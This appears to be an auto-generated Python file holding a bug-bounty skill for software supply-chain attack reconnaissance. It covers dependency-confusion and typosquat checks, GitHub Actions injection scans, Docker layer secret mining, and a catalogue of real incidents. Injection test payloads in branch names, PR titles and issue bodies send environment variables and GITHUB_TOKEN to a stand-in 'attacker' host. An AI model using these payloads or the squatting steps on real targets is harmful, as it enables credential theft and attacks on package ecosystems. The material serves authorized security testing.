#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/supply-chain-attack-recon

Skill: Direct guesses
Desc : External recon for software supply-chain attack surface — package-namespace squatting candidates, dependency-confusion vulnerabilities, GitHub Actions injection openings, container image registry exposure, SBOM mining, internal-package-name leakage, and CI/CD configuration exposure. Reconnaissance and identification ONLY — actual package publishing / typosquat attacks are EXTERNAL-OFFENSIVE and require explicit written sign-off because they can affect the entire npm/PyPI ecosystem. Use when the target has a public GitHub org, when their build artifacts/SBOMs are reachable, when their docker images are on Docker Hub/GHCR, or when you find internal package names in their JS bundles.

Run:  python claude-bughunter-supply-chain-attack-recon.py --help
      python claude-bughunter-supply-chain-attack-recon.py --list
      python claude-bughunter-supply-chain-attack-recon.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/supply-chain-attack-recon'
TITLE = 'Direct guesses'
DESCRIPTION = 'External recon for software supply-chain attack surface — package-namespace squatting candidates, dependency-confusion vulnerabilities, GitHub Actions injection openings, container image registry exposure, SBOM mining, internal-package-name leakage, and CI/CD configuration exposure. Reconnaissance and identification ONLY — actual package publishing / typosquat attacks are EXTERNAL-OFFENSIVE and require explicit written sign-off because they can affect the entire npm/PyPI ecosystem. Use when the target has a public GitHub org, when their build artifacts/SBOMs are reachable, when their docker images are on Docker Hub/GHCR, or when you find internal package names in their JS bundles.'

PAYLOADS = {
    'main': ["name: supply-chain-attack-recon", "description: External recon for software supply-chain attack surface \u2014 package-namespace squatting candidates, dependency-confusion vulnerabilities, GitHub Actions injection openings, container image registry exposure, SBOM mining, internal-package-name leakage, and CI/CD configuration exposure. Reconnaissance and identification ONLY \u2014 actual package publishing / typosquat attacks are EXTERNAL-OFFENSIVE and require explicit written sign-off because they can affect the entire npm/PyPI ecosystem. Use when the target has a public GitHub org, when their build artifacts/SBOMs are reachable, when their docker images are on Docker Hub/GHCR, or when you find internal package names in their JS bundles.", "sources: alex-birsan-dependency-confusion, supply-chain-research, github-actions-security, cisa-advisories, mandiant-tag, github-security-blog, snyk-research", "report_count: 12"],
    'when-to-use': ["Trigger when:", "- Target has a public GitHub organization (find via OSINT)", "- JS bundles reference internal-looking package names (`@target-internal/...`, `target-utils`, `target-shared`)", "- Build logs, SBOMs, or `package-lock.json` files are publicly accessible", "- Target uses CI/CD that's partially public (GitHub Actions, GitLab CI, Bitrise)", "- Docker images on Docker Hub/GHCR/Quay belong to target org", "- Findings include `npmrc`/`pip.conf`/`gradle.properties` with internal registry URLs", "- `.github/workflows/*.yml` files reference internal tooling", "Do NOT use for:", "- Internal-network artifact registries (out of scope per external boundary)", "- Actually publishing typosquats / dep-confusion packages without explicit OK", "- Compromising upstream open-source projects (massive blast radius \u2014 illegal in most jurisdictions without authorization)"],
    'the-supply-chain-attack-surface-map': ["Target Org", "\u251c\u2500\u2500 Public GitHub Org \u2192 workflow files \u2192 secrets exfil opportunities", "\u251c\u2500\u2500 Internal package names in JS/Android bundles \u2192 dependency confusion", "\u251c\u2500\u2500 Docker images on public registries \u2192 secrets in layers, RCE on pull", "\u251c\u2500\u2500 SBOM / artifact metadata \u2192 exact dep versions for known-vuln chaining", "\u251c\u2500\u2500 npmrc / pip.conf in repos \u2192 internal registry URL disclosure", "\u251c\u2500\u2500 External package dependencies \u2192 typosquat name candidates", "\u2514\u2500\u2500 Build/release pipelines \u2192 injection if pull_request_target etc."],
    'step-1-github-org-discovery': ["```bash", "TARGET=\"<brand>\"  # set to target brand name"],
    'direct-guesses': ["for guess in $TARGET \"${TARGET}-tech\" \"${TARGET}corp\" \"${TARGET}-io\" \"${TARGET}-eng\"; do", "curl -sI \"https://github.com/$guess\" | grep -E \"HTTP|status\" | head -1"],
    'via-whois-email-domain-github-search': ["gh search users --owner-affiliations=organization --query \"$TARGET\" --limit 10"],
    'via-employees-reverse-from-social-media-github-profile': [],
    'many-employees-list-their-employer-org-on-their-github-profile': [],
    'step-2-enumerate-public-repos-for-sensitive-artifacts': ["```bash", "ORG=\"targetorg\""],
    'list-public-repos': ["gh repo list \"$ORG\" --limit 100 --json name,description,visibility,defaultBranchRef"],
    'look-for-high-signal-repo-names': ["gh repo list \"$ORG\" --limit 100 --json name | jq -r '.[].name' | grep -iE \"internal|infra|deploy|config|secret|setup|sdk|api\""],
    'clone-all-small-org-or-selectively': ["gh repo clone \"$ORG/$repo_name\""],
    'step-3-internal-package-name-discovery': [],
    'from-js-bundles': ["```bash"],
    'js-bundles-are-the-easiest-source-of-internal-npm-names': ["curl -sk https://target.com/main.js | grep -oE '@[a-z-]+/[a-z-]+' | sort -u", "curl -sk https://target.com/main.js | grep -oE 'require\\(\"[^\"]+\"\\)' | sort -u"],
    'look-for-scoped-names-that-are-not-public-on-npm': ["for pkg in @target/utils @target-internal/api @companybrand/sdk; do", "status=$(curl -sI \"https://registry.npmjs.org/$pkg\" | head -1 | awk '{print $2}')", "echo \"  $pkg \u2192 $status\""],
    'from-github-repo-package-json-files': ["```bash"],
    'public-repos-with-package-json-that-reference-internal-scopes': ["for repo in $(gh repo list \"$ORG\" --limit 50 --json name --jq '.[].name'); do", "pkg=$(gh api \"repos/$ORG/$repo/contents/package.json\" --jq '.content' 2>/dev/null | base64 -d 2>/dev/null)", "echo \"$pkg\" | jq -r '.dependencies // {} | keys[]' 2>/dev/null | grep -E '^@[a-z-]+/'", "done | sort -u"],
    'from-python-projects': ["```bash"],
    'internal-pip-package-names': ["for repo in $(gh repo list \"$ORG\" --limit 50 --json name --jq '.[].name'); do", "gh api \"repos/$ORG/$repo/contents/requirements.txt\" --jq '.content' 2>/dev/null | base64 -d 2>/dev/null", "done | sort -u | grep -vE '^(requests|django|flask|numpy|pandas|...common)'"],
    'step-4-dependency-confusion-vulnerability-check': ["For each internal-looking package name discovered:", "```bash", "NAME=\"@target-internal/utils\"   # example"],
    'npm-check': ["curl -sI \"https://registry.npmjs.org/$NAME\" | head -1"],
    '404-name-is-registerable-dependency-confusion-possible': [],
    'pypi-check-no-scopes-just-name': ["NAME=\"target_utils\"", "curl -sI \"https://pypi.org/project/$NAME/\" | head -1"],
    '404-name-is-registerable': [],
    'rubygems': ["curl -sI \"https://rubygems.org/api/v1/gems/$NAME.json\" | head -1"],
    'go-modules-slightly-different-since-module-names-are-urls': [],
    'check-if-module-path-is-reachable': ["curl -sI \"https://proxy.golang.org/github.com/$ORG/$NAME/@latest\" | head -1", "**Severity calibration:** Just because a name is unclaimed doesn't mean it's exploitable. You also need:", "1. Evidence the target's BUILD SYSTEM resolves names from public registries (not just their internal one)", "2. OR evidence the target's package manager is configured insecurely (e.g., `.npmrc` without `@scope:registry=` mapping)", "3. OR the package would be installed by their builds (it's actually in package.json, not just referenced in dead code)", "A 404 on registry without supporting context is INFORMATIONAL only."],
    'step-5-typosquat-candidates-around-external-dependencies': ["For each external public dependency the target uses:", "```bash"],
    'common-typosquat-patterns': [],
    'original-react-router-dom': [],
    'typos': [],
    'react-router-doms-extra-s': [],
    'react-routter-dom-double-t': [],
    'react-rotuer-dom-transposed': [],
    'react-router-dom-double-dash': [],
    'react-router-dorn-m-rn': [],
    'reactrouterdom-no-dashes': [],
    'generate-candidates': ["python3 -c \"", "import sys", "name='react-router-dom'", "for i in range(len(name)):", "print(name[:i] + name[i+1:])   # delete", "if i < len(name)-1:", "print(name[:i] + name[i+1] + name[i] + name[i+2:])  # transpose"],
    'check-which-candidates-are-unclaimed-on-the-registry': ["for candidate in ...; do", "status=$(curl -sI \"https://registry.npmjs.org/$candidate\" | head -1 | awk '{print $2}')", "[ \"$status\" = \"404\" ] && echo \"  UNCLAIMED: $candidate\"", "**\u26a0 EXTERNAL-OFFENSIVE NOTE:** publishing a typosquat package to a public registry is an attack on the wider ecosystem. NEVER do this without explicit, written, scope-clarified sign-off. It can affect users outside your engagement and may be illegal."],
    'step-6-github-actions-workflow-injection-scan': ["For each public repo with `.github/workflows/`:", "```bash", "for repo in $(gh repo list \"$ORG\" --limit 50 --json name --jq '.[].name'); do", "workflows=$(gh api \"repos/$ORG/$repo/contents/.github/workflows\" --jq '.[].name' 2>/dev/null)", "for wf in $workflows; do", "content=$(gh api \"repos/$ORG/$repo/contents/.github/workflows/$wf\" --jq '.content' 2>/dev/null | base64 -d 2>/dev/null)", "echo \"=== $repo/$wf ===\"", "echo \"$content\" | grep -E 'pull_request_target'", "echo \"$content\" | grep -E '\\$\\{\\{[^}]*github\\.(event|head_ref|pull_request)[^}]*\\}\\}'", "echo \"$content\" | grep -B1 -A2 'run:' | grep -E '\\$\\{\\{ ?github\\.event\\.'", "echo \"$content\" | grep -E 'ref:.*pull_request|head_ref'", "echo \"$content\" | grep -E 'runs-on:.*self-hosted'", "echo \"$content\" | grep -E 'uses: *[^ ]+/[^ ]+@(v?[0-9]+([.][0-9]+)*|main|master|latest)\\b' | grep -v '@[0-9a-f]\\{40\\}'"],
    'injection-patterns-to-flag-severity-guide': [],
    'github-actions-context-injection-sinks-branch-name-pr-title-issue-body': ["Untrusted context flowing from PR metadata into `run:` blocks is a classic injection vector. Test payloads:", "```bash"],
    'malicious-branch-name-test-in-a-fork-pr': ["git checkout -b 'feat/x\"; curl https://attacker/?d=$(env | base64);\"'", "git push origin 'feat/x\"; curl https://attacker/?d=$(env | base64);\"'"],
    'malicious-pr-title-create-a-test-pr-with-this-title': ["PR_TITLE='x\"; curl https://attacker/?d=$(echo $GITHUB_TOKEN | base64);\"'"],
    'malicious-issue-body': ["ISSUE_BODY='x\"; curl https://attacker/?leak=$(git config user.name);\"'"],
    'then-watch-workflow-logs-if-the-injected-commands-execute-secrets-are-exfil-d': [],
    'public-github-actions-run-logs-leaks-secrets': ["Actions logs are public by default on public repos. Look for:", "```bash"],
    'list-all-action-runs-for-a-repo': ["gh api repos/OWNER/REPO/actions/runs --jq '.workflow_runs[] | {id, name, head_branch, status, conclusion}'"],
    'fetch-logs-from-a-run': ["gh api repos/OWNER/REPO/actions/runs/<id>/logs --jq '.logs' | base64 -d"],
    'search-logs-for-common-leakage-patterns': ["gh api repos/OWNER/REPO/actions/runs/<id>/logs | grep -iE 'token|key|secret|password|credential|aws_'", "Leaked secrets in logs = direct credential exfil; severity depends on the token type (GitHub PAT, npm token, AWS key, etc.)."],
    'static-detection-of-actions-injection-sinks-with-zizmor': ["For high-confidence automated flagging, run the `zizmor` analyzer on all workflow files:", "```bash"],
    'install-zizmor-rust-based-from-https-github-com-woodruffw-zizmor': ["cargo install zizmor"],
    'scan-all-workflows': ["zizmor .github/workflows/*.yml"],
    'output-includes-pull-request-target-mutable-tag-uses-context-interpolation-etc': [],
    'sort-findings-by-risk-tier': ["Zizmor saves manual regex work and catches edge cases (e.g., indirect context interpolation via variable references)."],
    'step-7-docker-container-image-registry-mining': ["```bash"],
    'docker-hub': ["curl -s \"https://hub.docker.com/v2/repositories/$ORG/?page_size=100\" | jq -r '.results[].name'"],
    'ghcr-github-container-registry-public-images-visible-in-repo-packages-tab': ["gh api \"users/$ORG/packages?package_type=container\" 2>/dev/null", "gh api \"orgs/$ORG/packages?package_type=container\" 2>/dev/null"],
    'for-each-image-list-tags': ["for img in image1 image2; do", "curl -s \"https://hub.docker.com/v2/repositories/$ORG/$img/tags?page_size=20\" | jq -r '.results[].name'"],
    'pull-and-inspect-layers': ["docker pull \"$ORG/$img:latest\"", "docker history --no-trunc \"$ORG/$img:latest\""],
    'mine-layers-for-secrets': ["docker save \"$ORG/$img:latest\" -o /tmp/image.tar", "mkdir -p /tmp/img && tar -xf /tmp/image.tar -C /tmp/img", "find /tmp/img -name \"*.tar*\" -exec tar -xf {} -C /tmp/img/extracted \\;"],
    'then-run-gitleaks-trufflehog-over-extracted-filesystem': ["trufflehog filesystem /tmp/img/extracted --no-update"],
    'step-8-sbom-artifact-metadata-leakage': ["```bash"],
    'look-for-sboms-published-as-releases-spdx-cyclonedx-format': ["gh api \"repos/$ORG/$REPO/releases\" --jq '.[] | .assets[] | select(.name | test(\"sbom|cyclonedx|spdx\"; \"i\")) | .browser_download_url'"],
    'json-dependency-lockfiles-in-releases': ["gh api \"repos/$ORG/$REPO/releases\" --jq '.[] | .assets[] | select(.name | test(\"lock|deps\"; \"i\")) | .browser_download_url'"],
    'exact-version-pinned-deps-known-cve-chaining': [],
    'compare-versions-to-nuclei-nvd-templates-or-osv-dev-for-known-vulns': ["curl -s \"https://api.osv.dev/v1/query\" -d '{\"package\": {\"name\": \"lodash\", \"ecosystem\": \"npm\"}, \"version\": \"4.17.10\"}'"],
    'step-9-internal-registry-url-leakage': ["```bash"],
    'npmrc-patterns': ["grep -r \"registry=\" .                                            # in cloned repos", "grep -r \"_authToken=\" .                                          # leaked npm token!", "grep -r \"@.*registry=\" .                                          # scoped registry"],
    'pip-config': ["grep -r \"extra-index-url\" .", "grep -r \"index-url\" ."],
    'gradle-maven': ["grep -rE \"(mavenCentral|maven\\s*\\{)\" .", "grep -r \"url.*\\(.*nexus\" ."],
    'each-leaked-internal-url-is-intel-flag-the-url-itself-even-if-not-directly-exploitable': [],
    'step-10-npm-pypi-organizational-presence': ["```bash"],
    'some-orgs-maintain-a-public-npm-scope-mirroring-their-brand': ["curl -s \"https://registry.npmjs.org/-/v1/search?text=scope:$ORG&size=50\" | jq '.objects[].package.name'"],
    'public-pypi-presence': ["curl -s \"https://pypi.org/simple/\" | grep \"$ORG\" | head -20"],
    'check-if-scope-is-taken-if-it-s-not-an-attacker-could-register': [],
    'relevant-for-any-internal-package-using-that-scope': ["curl -sI \"https://registry.npmjs.org/-/org/$ORG\""],
    'step-11-frontend-and-third-party-dependency-checks': [],
    'compromised-cdn-detection-polyfill-io-etc': ["Known-compromised CDNs and analytics services have been weaponized. Check target's public HTML/JS:", "```bash"],
    'detect-usage-of-polyfill-io-and-similar-historically-compromised-services': ["curl -s https://target.com | grep -i polyfill", "curl -s https://target.com | grep -iE '(polyfill\\.io|cdn\\.jsdelivr\\.net.*polyfill|babel\\.min\\.js)'"],
    'check-javascript-bundles': ["for bundle in public/*.js main.*.js app.*.js; do", "grep -i polyfill \"$bundle\" && echo \"FOUND: $bundle\"", "Reference: polyfill.io was compromised in 2024 to serve malicious payloads. Presence = supply-chain risk."],
    'tooling': [],
    'severity-scoring-guidance': [],
    'anti-patterns': ["- **DO NOT publish a typosquat / dep-confusion package without explicit, signed, scope-clarified authorization** \u2014 this affects users outside the engagement", "- **DO NOT submit PRs to client repos as part of testing without specific OK** \u2014 workflow injection PoCs may be needed but they touch CI/CD and other developers", "- **DO NOT scrape entire npm/PyPI for typosquat candidates** \u2014 irresponsible and noisy", "- **DO NOT confuse \"name is unclaimed\" with \"exploitable dependency confusion\"** \u2014 the build system matters; many orgs use proper scope-mapping that prevents the attack", "- **DO NOT touch GitHub Actions self-hosted runners** \u2014 they may be inside the client network and outside the external scope", "- **DO NOT pull large Docker images blindly** \u2014 image bandwidth can be 5-50GB; review tags first"],
    'what-constitutes-a-deliverable-finding': ["A supply-chain finding needs ALL of:", "1. **Concrete name/path** \u2014 exact internal package name, exact workflow file path, exact image tag", "2. **Vulnerability mechanism** \u2014 dep-confusion / typosquat / injection / etc.", "3. **Exploitability evidence** \u2014 proof the build/install would actually use the attacker's payload (not just \"name is unclaimed\")", "4. **Severity** \u2014 calibrated to blast radius (one developer? all developers? all users of the package?)", "5. **Recommendation** \u2014 specific (e.g., \"register the unused name @target-internal/utils on npm AS YOUR OWN even if unused; configure `.npmrc` scope:registry mapping\")"],
    'bridge-to-neighboring-skills': ["- `apk-redteam-pipeline` \u2014 APKs reveal internal package names too (find them in decompiled `build.gradle`)", "- `cloud-iam-deep` \u2014 CI/CD secrets often = cloud credentials; this skill finds them, that skill validates them", "- `hunt-cloud-misconfig` \u2014 CI/CD pipeline misconfig (Jenkins / GitLab Runner) overlap", "- `m365-entra-attack` \u2014 Azure DevOps pipelines are part of Entra surface", "- `redteam-report-template` \u2014 supply-chain findings need extra clarity on blast radius (one repo vs whole ecosystem)", "- `mid-engagement-ir-detection` \u2014 registering a name on public npm triggers nothing inside the client, but ANY publish action is loud and audit-trailed"],
    'external-only-boundary-check': ["This skill is squarely external \u2014 all targets are public registries / public GitHub. If the engagement involves the client's internal artifact registry (internal Nexus, JFrog, Sonatype), that is internal infrastructure and OUT OF SCOPE per `feedback_skill_boundaries`. Report internal-registry URL exposure as a finding; do not attempt to enumerate it."],
    'real-world-references': ["- **Alex Birsan 2021** \u2014 Original dependency-confusion research, $130K+ in bounties from Apple/Microsoft/PayPal/Yelp/etc.", "- **ua-parser-js 2021** \u2014 npm package compromise via stolen maintainer credentials", "- **node-ipc 2022** \u2014 Maintainer-introduced supply-chain malicious update", "- **3CX 2023** \u2014 Cascading supply-chain attack via X_TRADER \u2192 3CX \u2192 customers", "- **XZ Utils 2024** \u2014 Multi-year social-engineering supply-chain attack on upstream OSS", "Each of these is worth reading for what made the attack effective and what red flags existed earlier."],
    'disclosed-case-catalogue-citations': ["Twelve well-documented public cases, mapped to the recon surface above. Each entry: attack name, year, flow, root cause, impact, references, and the recon-skill takeaway."],
    '1-solarwinds-orion-sunburst-cisa-aa20-352a-dec-2020': ["- **Flow:** APT29 (UNC2452 / Cozy Bear) breached SolarWinds' build pipeline and inserted the SUNBURST backdoor into `SolarWinds.Orion.Core.BusinessLayer.dll`. The trojanized DLL was code-signed with SolarWinds' legitimate certificate and shipped to ~18,000 customers via the normal auto-update channel between March and June 2020.", "- **Root cause:** Build-environment compromise \u2014 attackers modified source mid-compilation; signing infrastructure trusted the build output without verifying source integrity.", "- **Impact:** ~18,000 organisations received the backdoor; ~100 (incl. US Treasury, Commerce, DHS, DoJ, Microsoft, FireEye/Mandiant) received the SECOND-stage TEARDROP/BEACON payload. SolarWinds reported >$40M in direct response costs; class-action settlement $26M.", "- **References:**", "- CISA AA20-352A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a", "- Mandiant write-up (SUNBURST): https://cloud.google.com/blog/topics/threat-intelligence/sunburst-additional-technical-details", "- Microsoft analysis: https://www.microsoft.com/en-us/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack/", "- SolarWinds post-mortem: https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "- **Recon takeaway:** Whenever a target ships signed binaries from their own CI, the recon check is: is the build environment itself reachable? Look for exposed Jenkins/GitLab CI consoles, public TeamCity agents, or build artefacts that leak source paths. A code-signing cert plus a compromised build = unstoppable trust chain."],
    '2-3cx-voip-softphone-supply-chain-cve-2023-29059-march-2023': ["- **Flow:** DPRK-attributed Lazarus subgroup (UNC4736 / Labyrinth Chollima) trojanized the 3CX DesktopApp (Electron-based softphone) on both Windows and macOS. Initial entry was via a PREVIOUS supply-chain attack \u2014 an employee installed a backdoored copy of Trading Technologies' X_TRADER, the FIRST disclosed cascading supply-chain compromise (one supply-chain victim becomes another's vector).", "- **Root cause:** Dev workstation compromise \u2192 access to 3CX source/build pipeline \u2192 malicious `ffmpeg.dll` and `d3dcompiler_47.dll` shipped in signed installer.", "- **Impact:** ~600,000 organisations use 3CX; tens of thousands of trojanized clients downloaded. Lazarus selectively activated second-stage payloads against cryptocurrency and trading firms.", "- **References:**", "- CrowdStrike: https://www.crowdstrike.com/en-us/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/", "- SentinelOne: https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/", "- Mandiant cascading attack analysis: https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise", "- 3CX post-mortem: https://www.3cx.com/blog/news/desktopapp-security-alert-update/", "- **Recon takeaway:** Cascading supply chain is real \u2014 your target's vendors' vendors matter. When recon enumerates \"what software does this org install on engineer laptops,\" each one is itself a supply-chain target. Electron apps (signed JS bundles) are especially common vectors."],
    '3-moveit-transfer-mass-exploitation-cve-2023-34362-may-july-2023': ["- **Flow:** Cl0p ransomware affiliate (FIN11 / Lace Tempest) discovered an unauthenticated SQLi in Progress MOVEit Transfer, deployed the LEMURLOOT webshell, and exfiltrated files from every internet-reachable instance over a ~2-week window before the patch dropped on 31 May 2023.", "- **Root cause:** Pre-auth SQLi in `moveitisapi/moveitisapi.dll` \u2192 arbitrary SQL \u2192 write webshell via `xp_cmdshell`-equivalent path. Classic single-CVE-mass-exploitation; not a build-pipeline attack but a SHIPPED-CODE supply-chain failure.", "- **Impact:** ~2,700 organisations confirmed compromised, ~95 million individuals' PII leaked (BBC, Shell, BA, US DoE, Louisiana OMV, Oregon DMV, etc.). Estimated losses >$15B aggregated.", "- **References:**", "- CISA AA23-158A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a", "- Progress advisory: https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023", "- Mandiant: https://cloud.google.com/blog/topics/threat-intelligence/zero-day-moveit-data-theft", "- Huntress technical breakdown: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response", "- **Recon takeaway:** Vendor file-transfer products (MOVEit, Accellion FTA, GoAnywhere MFT, Cleo Harmony) are the recurring \"internet edge, holds everyone's data, runs on Windows\" pattern. Always fingerprint by HTML title / favicon hash early in recon; a single edge-product CVE = entire customer base."],
    '4-codecov-bash-uploader-compromise-apr-2021': ["- **Flow:** Attackers gained access to Codecov's Docker image build process via a credential mistake in the image-creation flow, then modified the `Bash Uploader` script (`https://codecov.io/bash`) to exfiltrate environment variables to a third-party IP. The modification persisted from 31 Jan 2021 to 1 Apr 2021 \u2014 two months before detection by a customer who noticed an SHA-256 mismatch.", "- **Root cause:** Docker image build leaked a credential allowing modification of the served bash script; no integrity verification (no signed pinned hash) on the customer side.", "- **Impact:** Every CI run worldwide that piped `curl -s https://codecov.io/bash | bash` for 2 months exfiltrated env vars. Confirmed downstream victims: HashiCorp (rotated GPG key), Twilio, Rapid7 (source-code partial exposure), Mercari, Confluent, Atlassian.", "- **References:**", "- Codecov post-mortem: https://about.codecov.io/security-update/", "- HashiCorp advisory: https://discuss.hashicorp.com/t/hcsec-2021-12-codecov-security-event-and-hashicorp-gpg-key-exposure/23512", "- Mercari disclosure: https://about.mercari.com/en/press/news/articles/20210521_incidentreport/", "- Rapid7: https://www.rapid7.com/blog/post/2021/05/13/rapid7-discloses-its-response-to-codecov-incident/", "- **Recon takeaway:** \"Curl-bash-install\" patterns in public CI workflows are gold for this recon skill \u2014 search `.github/workflows/` for `curl ... | bash`, `wget ... | sh`, `iwr ... | iex`. Any third-party URL fed into a shell is a supply-chain blast radius. Pinned SHAs in workflows mitigate; absence of pinning = finding."],
    '5-ua-parser-js-npm-hijack-oct-2021': ["- **Flow:** Attacker phished/credential-stuffed the maintainer's npm account and published `0.7.29`, `0.8.0`, and `1.0.0` of `ua-parser-js` (\u22487M weekly downloads, transitively reaching Facebook, Microsoft, Amazon, IBM). The malicious versions ran a `preinstall` hook that downloaded a cryptominer + Windows password-stealer (Jason credential stealer).", "- **Root cause:** Maintainer npm account had no 2FA / weak credentials; npm did not enforce 2FA for high-value publishers at the time.", "- **Impact:** Packages live ~4 hours before takedown but tens of thousands of installs in that window. CISA issued an emergency alert \u2014 the first time CISA had ever warned on an npm-package compromise.", "- **References:**", "- GitHub Security advisory: https://github.com/advisories/GHSA-pjwm-rvh2-c87w", "- CISA alert: https://www.cisa.gov/news-events/alerts/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js", "- Maintainer's incident note: https://github.com/faisalman/ua-parser-js/issues/536", "- Snyk analysis: https://snyk.io/blog/npm-security-malicious-code-found-in-npm-package-ua-parser-js/", "- **Recon takeaway:** Identify your target's top-30 npm/PyPI maintainers by package download count, then check whether their accounts have 2FA enabled (npm exposes this via `npm profile get` on org members, partially public via the registry API). Recon output: \"these 4 maintainers control packages with X installs and have no 2FA per public registry data.\""],
    '6-event-stream-npm-package-nov-2018': ["- **Flow:** Original maintainer Dominic Tarr (no longer using the module) handed `event-stream` (\u22482M weekly downloads) to a new contributor named \"right9ctrl\" who'd offered to maintain it. The new maintainer added `flatmap-stream` as a dependency, then pushed an update to `flatmap-stream` containing payload targeting the Copay bitcoin wallet's build \u2014 stole BTC/BCH wallet seeds from any Copay user.", "- **Root cause:** Social engineering of a maintenance-handover; no review of new contributors taking over critical packages. The malicious dep was only triggered when `event-stream` was bundled into the Copay wallet (build-context targeting).", "- **Impact:** Copay wallet users had keys stolen; exact dollar damage never disclosed publicly. Triggered the npm-wide 2FA push and \"popular packages need additional review\" policy.", "- **References:**", "- GitHub Security advisory: https://github.com/advisories/GHSA-mh6f-8j2x-4483", "- npm post-mortem: https://github.blog/2018-11-26-npm-package-event-stream/", "- Original disclosure thread: https://github.com/dominictarr/event-stream/issues/116", "- Snyk write-up: https://snyk.io/blog/a-post-mortem-of-the-malicious-event-stream-backdoor/", "- **Recon takeaway:** Check `npm view <pkg> maintainers` and recent maintainer changes for packages your target depends on. A maintainer change in the past 90 days on a 100K+ download package is a yellow flag. Also: payload-targeting-by-build-context (only fires when bundled into specific app) is HARD to detect \u2014 static scanners miss it."],
    '7-php-git-server-compromise-march-2021': ["- **Flow:** Attackers pushed two malicious commits to the official `php-src` git repository on `git.php.net`, signed as Rasmus Lerdorf and Nikita Popov. The commits added a Zend backdoor that executed code from the `User-Agentt` HTTP header (note double-t).", "- **Root cause:** Self-hosted git server (Gitolite-based `git.php.net`) had a credential / authentication flaw \u2014 possibly password-stored-in-plain in a user database leak. PHP team migrated to GitHub as canonical source after this incident.", "- **Impact:** Backdoor commits caught within hours, never shipped in a release. But this is the canonical case of \"self-hosted source-of-truth = single point of failure.\"", "- **References:**", "- PHP.net post-mortem: https://news-web.php.net/php.internals/113838", "- Nikita Popov's analysis: https://externals.io/message/113848", "- ZDNet coverage: https://www.zdnet.com/article/php-internal-git-server-hacked-with-malicious-code-pushed-to-the-php-src-repo/", "- **Recon takeaway:** Targets running self-hosted git (Gitea, Gitolite, Phabricator, Bitbucket Server) are higher-risk than GitHub-hosted. Recon should fingerprint git-server software, check for default creds, and watch for SSH-key-based pushes from unexpected IPs (visible in commit metadata)."],
    '8-log4shell-cve-2021-44228-dec-2021': ["- **Flow:** Not a supply-chain ATTACK per se, but the canonical \"you don't know what's in your dependency tree\" event. A JNDI lookup feature in Apache Log4j 2.x allowed remote code execution via `${jndi:ldap://attacker/...}` in any logged string. Because Log4j is transitively pulled by thousands of Java apps, hundreds of millions of systems were vulnerable.", "- **Root cause:** Unsafe-by-default feature shipped in 2013 (`MessageLookup` substitution); deeply nested transitive dependency made inventory and patching almost impossible.", "- **Impact:** \"Most critical vulnerability in a decade\" per CISA Director Jen Easterly. Affected every major cloud, every Apache product, every Java enterprise stack. Ongoing mass exploitation by Conti, Khonsari ransomware, state actors.", "- **References:**", "- CISA Log4j page: https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a", "- Apache advisory: https://logging.apache.org/log4j/2.x/security.html", "- LunaSec breakdown: https://www.lunasec.io/docs/blog/log4j-zero-day/", "- GovCERT.ch tree of impacted products: https://www.cisa.gov/known-exploited-vulnerabilities-catalog (KEV entry)", "- **Recon takeaway:** SBOMs are the answer here. The recon skill's Step 8 (SBOM mining) earns its keep \u2014 pulling SPDX/CycloneDX from public release artefacts gives you exact transitive dependency versions, which you can then map to OSV / NVD for known CVEs. Most orgs underestimate their transitive depth."],
    '9-tj-actions-changed-files-github-action-compromise-cve-2025-30066-march-2025': ["- **Flow:** Attacker compromised the `tj-actions/changed-files` GitHub Action (used by ~23,000 repos) and modified all version tags v1\u2013v45 to point to a malicious commit. The injected code ran `printenv` and dumped CI secrets to GitHub Actions logs \u2014 visible to anyone with read access on public repos.", "- **Root cause:** Mutable tag references in GitHub Actions \u2014 `uses: tj-actions/changed-files@v35` resolves at run time, so an attacker who controls the repo can repoint old tags. Most consumers had not pinned to commit SHA (`@<sha>`).", "- **Impact:** ~23,000 repositories impacted; CISA added to KEV; thousands of secrets (AWS keys, npm tokens, Docker Hub creds) leaked into public Action logs. Multiple downstream incidents (Coinbase, Cloudflare, others) traced back.", "- **References:**", "- CISA KEV entry: https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-github-action-cve-2025-30066", "- StepSecurity disclosure: https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised", "- Wiz analysis: https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066", "- Semgrep: https://semgrep.dev/blog/2025/popular-github-action-tj-actionschanged-files-is-compromised/", "- **Recon takeaway:** This is the highest-yield current recon vector. Grep public repos for `uses: <org>/<repo>@v\\d+` (mutable tag) versus `uses: <org>/<repo>@<sha>` (pinned). Any unpinned third-party action = supply-chain risk. The skill's Step 6 should explicitly flag mutable-tag usage."],
